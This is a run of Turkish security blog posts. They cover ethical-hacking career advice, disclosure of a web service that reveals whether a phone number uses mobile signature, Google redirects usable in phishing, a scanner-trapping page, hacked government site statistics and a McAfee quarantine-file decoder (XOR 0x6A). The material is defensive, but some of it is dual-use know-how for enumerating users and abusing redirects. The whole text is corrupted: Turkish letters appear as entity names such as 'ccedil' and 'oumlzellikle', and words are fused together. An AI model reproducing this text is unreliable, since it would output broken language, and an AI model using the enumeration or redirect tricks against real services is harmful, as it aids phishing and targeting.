Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

